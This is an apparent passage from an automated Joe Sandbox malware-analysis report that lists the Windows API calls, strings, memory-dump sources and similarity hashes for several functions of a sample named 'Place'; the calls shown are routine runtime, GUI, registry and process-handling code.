Part of subcall function 00582111: GetStockObject.GDI32(00000011), ref: 00582163
Part of subcall function 00582111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0058216D

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00607C57
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00607C64
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00607C6F
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00607C7E
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00607C8A

Strings

Msctls_Progress32, xrefs: 00607C28

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: b74d3afae69df543bdb0815cffceb96b210a2eb4b3770c85235459f11808c2aa
Instruction ID: a3e2cd86030f9e8eb1f0ab9a7d06937376e03a6481e53fc53fb4c569f10a9c56
Opcode Fuzzy Hash: b74d3afae69df543bdb0815cffceb96b210a2eb4b3770c85235459f11808c2aa
Instruction Fuzzy Hash: 271182B2550219BEFF159F60CC85EE77F6EEF08798F015115BA08A6190C772AC21DBA4

Function 005A9D16 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 005A9D16

Part of subcall function 005A33B7: EncodePointer.KERNEL32(00000000), ref: 005A33BA
Part of subcall function 005A33B7: __initp_misc_winsig.LIBCMT ref: 005A33D5
Part of subcall function 005A33B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 005AA0D0
Part of subcall function 005A33B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 005AA0E4
Part of subcall function 005A33B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 005AA0F7
Part of subcall function 005A33B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 005AA10A
Part of subcall function 005A33B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 005AA11D
Part of subcall function 005A33B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 005AA130
Part of subcall function 005A33B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 005AA143
Part of subcall function 005A33B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 005AA156
Part of subcall function 005A33B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 005AA169
Part of subcall function 005A33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 005AA17C
Part of subcall function 005A33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 005AA18F
Part of subcall function 005A33B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 005AA1A2
Part of subcall function 005A33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 005AA1B5
Part of subcall function 005A33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 005AA1C8
Part of subcall function 005A33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 005AA1DB
Part of subcall function 005A33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 005AA1EE

__mtinitlocks.LIBCMT ref: 005A9D1B
__mtterm.LIBCMT ref: 005A9D24

Part of subcall function 005A9D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,005A9D29,005A7EFD,0063CD38,00000014), ref: 005A9E86
Part of subcall function 005A9D8C: _free.LIBCMT ref: 005A9E8D
Part of subcall function 005A9D8C: DeleteCriticalSection.KERNEL32(0Rd,?,?,005A9D29,005A7EFD,0063CD38,00000014), ref: 005A9EAF

__calloc_crt.LIBCMT ref: 005A9D49
__initptd.LIBCMT ref: 005A9D6B
GetCurrentThreadId.KERNEL32 ref: 005A9D72

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: ab9de0b07d36642e522ab6edbea6c8d77f46cb1b9baaf2d614973bf050bd1707
Instruction ID: 8d01b51de5f9309bd7444f6f3f9a87637dae76edb1e2d89623df353403321355
Opcode Fuzzy Hash: ab9de0b07d36642e522ab6edbea6c8d77f46cb1b9baaf2d614973bf050bd1707
Instruction Fuzzy Hash: 63F06D325097726AEB347B747C0B69E7ED5FB83730F20861AF550D60D2EF2088814190

Function 005A41B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,005A4282,?), ref: 005A41D3
GetProcAddress.KERNEL32(00000000), ref: 005A41DA
EncodePointer.KERNEL32(00000000), ref: 005A41E6
DecodePointer.KERNEL32(00000001,005A4282,?), ref: 005A4203

Strings

RoInitialize, xrefs: 005A41C2
combase.dll, xrefs: 005A41CE

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 3fd57ac95e8e11366cf27ecec4f3324602287f5d982f4fbaafd412135df54643
Instruction ID: 1a63c7f1015151e43d2af06ef8f456513fd94d703039923e4f028e1da0d7c399
Opcode Fuzzy Hash: 3fd57ac95e8e11366cf27ecec4f3324602287f5d982f4fbaafd412135df54643
Instruction Fuzzy Hash: DBE01A78A90751AFEF105BB0EC4DB983A67BB56B06F64A425B412DA1B0CBF551C8CF00

Function 005A428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,005A41A8), ref: 005A42A8
GetProcAddress.KERNEL32(00000000), ref: 005A42AF
EncodePointer.KERNEL32(00000000), ref: 005A42BA
DecodePointer.KERNEL32(005A41A8), ref: 005A42D5

Strings

RoUninitialize, xrefs: 005A4297
combase.dll, xrefs: 005A42A3

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 4a82631881a0d81597e714ee144c90c2d65933e5486e4f2d841ab2e1b9c6f054
Instruction ID: 6532a79b495003e2befebda55f99459f0c42dde687e4bc2fcdb4e80d5453c2c1
Opcode Fuzzy Hash: 4a82631881a0d81597e714ee144c90c2d65933e5486e4f2d841ab2e1b9c6f054
Instruction Fuzzy Hash: 96E0B678950701ABEF109BA0AD0DB843A67BB56B06F58A11AF002DA9A1CBF44684CA10

Function 0058218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 005821B8
GetWindowRect.USER32(?,?), ref: 005821F9
ScreenToClient.USER32(?,?), ref: 00582221
GetClientRect.USER32(?,?), ref: 00582350
GetWindowRect.USER32(?,?), ref: 00582369

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 30bbc54ebd96c5001da07b6ea05588df303fe0fd46e13abfae7d7ce7b46ca07a
Instruction ID: c340ff9092207d3369ec133aea672fdc9c5bc8a846f89fe400cb073cd2ac9e78
Opcode Fuzzy Hash: 30bbc54ebd96c5001da07b6ea05588df303fe0fd46e13abfae7d7ce7b46ca07a
Instruction Fuzzy Hash: 65B16C39A00249DBDF10DFA8C9807EDBFB1FF08310F149529ED59AB254EB74AA50DB64

Function 005E6A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005E6BC6
_memmove.LIBCMT ref: 005E6B01

Part of subcall function 00584D37: __itow.LIBCMT ref: 00584D62
Part of subcall function 00584D37: __swprintf.LIBCMT ref: 00584DAC

_memmove.LIBCMT ref: 005E6B74
_memmove.LIBCMT ref: 005E6C5B
_memmove.LIBCMT ref: 005E6C74
_memmove.LIBCMT ref: 005E6C90

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: d64454222c26cb8bf762489de01ddacca6189937e32c11841e75ba2062f97503
Instruction ID: 5988e257de1c11cd1909d71f0851fa7c86c9ce338d23e4407ac94688f8c264a2
Opcode Fuzzy Hash: d64454222c26cb8bf762489de01ddacca6189937e32c11841e75ba2062f97503
Instruction Fuzzy Hash: 1161AC3050069BABCF15EF61C889EBE3FA8BF95388F044559FD996B292DB309C45CB50

Function 00600844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00591A36: _memmove.LIBCMT ref: 00591A77

Part of subcall function 0060147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0060040D,?,?), ref: 00601491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0060091D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0060095D
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00600980
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 006009A9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 006009EC
RegCloseKey.ADVAPI32(00000000), ref: 006009F9

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 9226cdae93db4f4da9836cf3ef816313388c8392bca9ff5051d551d48ba6cbe7
Instruction ID: 6533c19e694f6fd104767c3b72fffb73a7869286cfce636d5192d894517b4771
Opcode Fuzzy Hash: 9226cdae93db4f4da9836cf3ef816313388c8392bca9ff5051d551d48ba6cbe7
Instruction Fuzzy Hash: 7C516C31148206AFEB14EF64C849E6FBBEAFF89314F04491DF495872A2DB31E945CB52

Function 005DF688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 005DF6A2
VariantClear.OLEAUT32(00000013), ref: 005DF714
VariantClear.OLEAUT32(00000000), ref: 005DF76F
_memmove.LIBCMT ref: 005DF799
VariantClear.OLEAUT32(?), ref: 005DF7E6
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 005DF814

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 13379e1fab1a062a201dd48ff303fb9864463009d0c6d78ff47a0b320afd6750
Instruction ID: 168049fd67947c88b7d3972eea8d3e0ee74ca62e4a17743a029653b29e2908ea
Opcode Fuzzy Hash: 13379e1fab1a062a201dd48ff303fb9864463009d0c6d78ff47a0b320afd6750
Instruction Fuzzy Hash: 91512D75A00209EFDB24CF58C884AAABBF9FF48354B15856AED59DB301D730E951CBA0

Function 005E29B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005E29FF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005E2A4A
IsMenu.USER32(00000000), ref: 005E2A6A
CreatePopupMenu.USER32 ref: 005E2A9E
GetMenuItemCount.USER32(000000FF), ref: 005E2AFC
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 005E2B2D

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: de0be81845655781440e37595dd1c8748980320126feb2492ef4b5317b495411
Instruction ID: 73d73b6b17c0fd59f4ffadd4d747d676813df8d036e1c960a153cffa00eaab59
Opcode Fuzzy Hash: de0be81845655781440e37595dd1c8748980320126feb2492ef4b5317b495411
Instruction Fuzzy Hash: 0C51C17060038ADFDF29CF69C888AAEBFFDBF44314F144529E8919B295E7B09944CB51

Function 00581B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 005829E2: GetWindowLongW.USER32(?,000000EB), ref: 005829F3

BeginPaint.USER32(?,?,?,?,?,?), ref: 00581B76
GetWindowRect.USER32(?,?), ref: 00581BDA
ScreenToClient.USER32(?,?), ref: 00581BF7
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00581C08
EndPaint.USER32(?,?), ref: 00581C52

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 48ac9b54d44d89f8788865d45289fd9d660f5ea409a0cb2100369b048fa3f54f
Instruction ID: 3a6e0d31554fbffa0d30a20f58862dbf0079c2a38740a209f3c8f0f6b426137b
Opcode Fuzzy Hash: 48ac9b54d44d89f8788865d45289fd9d660f5ea409a0cb2100369b048fa3f54f
Instruction Fuzzy Hash: 5341B230104601AFDB10EF24CC88FB67FE9FB46360F140669F995972A1C770A845DB65

Function 0060BD10 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(006477B0,00000000,00FD52E8,?,?,006477B0,?,0060BC1A,?,?), ref: 0060BD84
EnableWindow.USER32(?,00000000), ref: 0060BDA8
ShowWindow.USER32(006477B0,00000000,00FD52E8,?,?,006477B0,?,0060BC1A,?,?), ref: 0060BE08
ShowWindow.USER32(?,00000004,?,0060BC1A,?,?), ref: 0060BE1A
EnableWindow.USER32(?,00000001), ref: 0060BE3E
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0060BE61

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 5f5e3571569cf6160c22e3384d0daca7fd13691f5aa0593c9755c5dceb02ae8e
Instruction ID: f29096428d1cb0352b649a8b88fbe7dca8eb8995448e15be36f4599628ab5777
Opcode Fuzzy Hash: 5f5e3571569cf6160c22e3384d0daca7fd13691f5aa0593c9755c5dceb02ae8e
Instruction Fuzzy Hash: 76413F34640144AFDB2ACF14C499BD6BBF2BF05314F1891A9EA588F3E2C771A855CB51

Function 005F7788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,005F550C,?,?,00000000,00000001), ref: 005F7796

Part of subcall function 005F406C: GetWindowRect.USER32(?,?), ref: 005F407F

GetDesktopWindow.USER32 ref: 005F77C0
GetWindowRect.USER32(00000000), ref: 005F77C7
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 005F77F9

Part of subcall function 005E57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005E5877

GetCursorPos.USER32(?), ref: 005F7825
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 005F7883

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: d700bc7088a701cb2be36d602e1b897f9193a8dc3af282ff94a223e94afe8ab4
Instruction ID: ee956710be9b545aeb6c31c918c43f1c1679aff906d02f3785adbb32f8cc383f
Opcode Fuzzy Hash: d700bc7088a701cb2be36d602e1b897f9193a8dc3af282ff94a223e94afe8ab4
Instruction Fuzzy Hash: 3C31D472508309ABD720DF14C849FABBBAAFFC8354F00491AF58597181DA74E944CBA2

Function 005D9431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 005D8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005D8CDE
Part of subcall function 005D8CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005D8CE8
Part of subcall function 005D8CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005D8CF7
Part of subcall function 005D8CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005D8CFE
Part of subcall function 005D8CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005D8D14

GetLengthSid.ADVAPI32(?,00000000,005D904D), ref: 005D9482
GetProcessHeap.KERNEL32(00000008,00000000), ref: 005D948E
HeapAlloc.KERNEL32(00000000), ref: 005D9495
CopySid.ADVAPI32(00000000,00000000,?), ref: 005D94AE
GetProcessHeap.KERNEL32(00000000,00000000,005D904D), ref: 005D94C2
HeapFree.KERNEL32(00000000), ref: 005D94C9

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 6708a4707f7047ac666ba53e633b6e5038476d0d3007f1a07f4b1ca02ae3307a
Instruction ID: 61b4b420e58c9a44298e356c7e33db10337e6f152b284316470e7b6e435e7ba2
Opcode Fuzzy Hash: 6708a4707f7047ac666ba53e633b6e5038476d0d3007f1a07f4b1ca02ae3307a
Instruction Fuzzy Hash: FB11AC72601604FFEF209FA8CC09BEF7BAAFB45316F14801BE84597211C73A9941CB60

Function 005D91CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 005D9200
OpenProcessToken.ADVAPI32(00000000), ref: 005D9207
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 005D9216
CloseHandle.KERNEL32(00000004), ref: 005D9221
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 005D9250
DestroyEnvironmentBlock.USERENV(00000000), ref: 005D9264

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 319638c730305fb81f616b818606cacd78c7fcf11bd03da214c6660358c88b65
Instruction ID: 6d671a4d2d82dfca4d2fce44e3316f77a05d144fa6deddb8d0f7f6a39fa627ce
Opcode Fuzzy Hash: 319638c730305fb81f616b818606cacd78c7fcf11bd03da214c6660358c88b65
Instruction Fuzzy Hash: 90114A7650124EABEF118F98DD49FDA7BA9FB08304F088016FA04A2160C2719EA0DB60

Function 005DC329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 005DC34E
GetDeviceCaps.GDI32(00000000,00000058), ref: 005DC35F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 005DC366
ReleaseDC.USER32(00000000,00000000), ref: 005DC36E
MulDiv.KERNEL32(000009EC,?,00000000), ref: 005DC385
MulDiv.KERNEL32(000009EC,?,?), ref: 005DC397

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 22d33d202b3322c5413bccc2e965342e95db5dee3e67f074a15cebebf94413ca
Instruction ID: 7dc46fb2cb363d594d9e507c29866c8fa07e33ad90e80856321eed73f1f71aa8
Opcode Fuzzy Hash: 22d33d202b3322c5413bccc2e965342e95db5dee3e67f074a15cebebf94413ca
Instruction Fuzzy Hash: A0014475E00319BBEF109BA99C49A9EBFB9EB48751F048067FA04A7380D6709D50CFA0

